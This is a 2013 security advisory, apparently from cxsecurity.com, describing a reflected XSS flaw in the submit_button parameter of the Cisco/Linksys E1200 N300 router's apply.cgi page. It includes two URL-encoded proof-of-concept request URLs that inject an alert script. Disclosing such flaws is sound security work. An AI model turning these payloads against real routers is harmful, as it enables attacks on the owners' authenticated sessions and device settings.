Cisco/Linksys E1200 N300 Reflected XSS

2013.04.29
Credit: Carl Benedict
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Summary -------------------- Software : Cisco/Linksys Router OS Hardware : E1200 N300 (others currently untested) Version : 2.0.04 (others currently untested) Website : http://www.linksys.com Issue : Reflected XSS Severity : Medium Researcher: Carl Benedict (theinfinitenigma) Product Description -------------------- The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. Details -------------------- The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. Sample URL #1 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Csc ript%3Ealert%281%29%3C%2fscript%3E%20%27 Sample URL #2 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72 %69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63 %72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto =dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_rebo ot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan _ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_dem and_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_ho stname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_i paddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco100 02&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease= 0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1 _0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wa n_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2= 0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 History -------------------- 04/26/2013 : Discovery 04/27/2013 : Advisory released


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top